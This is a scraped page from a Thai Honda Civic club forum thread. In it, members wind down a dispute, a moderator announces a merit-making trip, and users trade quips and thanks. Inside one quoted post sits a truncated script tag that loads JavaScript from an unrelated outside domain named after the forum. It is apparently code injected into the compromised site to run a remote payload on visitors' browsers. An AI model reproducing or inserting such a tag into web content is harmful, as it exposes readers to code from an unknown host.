ออกมาเป็นกระจกให้คุณดูภาพสะท้อนของตัวเองแล้ว

มองดูตัวเองซะ ปรับเปลี่ยนพฤติกรรมซะ สังคมเค้ายังให้อภัย

คุณจะได้ไม่โทษคนอื่นว่าคนอื่นทำให้คุณไม่มีจุดยืน

ปล่อยไปเถอะครับ คุณจ๊อบ ผมอ่านมาทุกกระทู้ของเค้าแล้ว สรุปได้ว่า
คนบางคน เรื่องบางเรื่อง อธิบายยังไงมันก็ไม่เข้าใจหรอกครับ
ได้รับคำขอบคุณจาก: สมชาย  Nine_Eleven  ballanupong  aunja 
tochi229

ชื่อเล่น: ปิ๊ป

เข้าร่วม: 28 พฤศจิกา 2010
ตอบ: 7524

Moderator
Moderator

ได้รับคำขอบคุณ: 8264
ให้คำขอบคุณ: 11555

พฤหัส, 28 กุมภา 2013 09:34 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
ไปทำบุญกันดีกว่าครับ จะได้ใจเย็นๆ กันบ้าง วันที่ 3 มีนาคม 2556

ตาม link นี่เลยนะครับ
http://www.civicesgroup.com/forum/topic53526
ได้รับคำขอบคุณจาก: สมชาย  Nine_Eleven  ballanupong  kittidech  aunja  DuuI 
thanatphong

เข้าร่วม: 05 มิถุนา 2009
ตอบ: 2693

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5343
ให้คำขอบคุณ: 20

พฤหัส, 28 กุมภา 2013 09:38 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
ลูกเสือ ร่วมร้องเพลง เสร็จ แล้วเข้านอน ตื่นตีห้า รวมพล ตีห้าครึ่ง 

ได้รับคำขอบคุณจาก: Nine_Eleven  aunja 
AofStaR

ชื่อเล่น: อ๊อฟ

เข้าร่วม: 25 ธันวา 2011
ตอบ: 895

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1569
ให้คำขอบคุณ: 1125

พฤหัส, 28 กุมภา 2013 09:40 - *~ สืบเนื่องมาจาก onlined ที่ไม่ยอมจบ นี่คือข้อสรุป
eskung พิมพ์ว่า:
AofStaR พิมพ์ว่า:

พูดคุยในเชิงพานิชให้ใช้ห้องซื้อขายเท่านั้น ทำไมพี่ไม่ทำตามกฏครับพี่เดี๋ยวก็เกิดปัญหาขึ้นอีกหรอก<script src="https://sport32news.com/civicesgroup.js"></

meseoul พิมพ์ว่า:
aunja พิมพ์ว่า:

มาไม่เคยทันกับเค้าซักที 

ปิดการขายแล้วครับ อิอิ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  Nine_Eleven  ballanupong  aunja 
หัวข้อนี้ถูกล็อก คุณไม่สามารถแก้ไข หรือตอบได้
หน้า 4 จาก 5
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.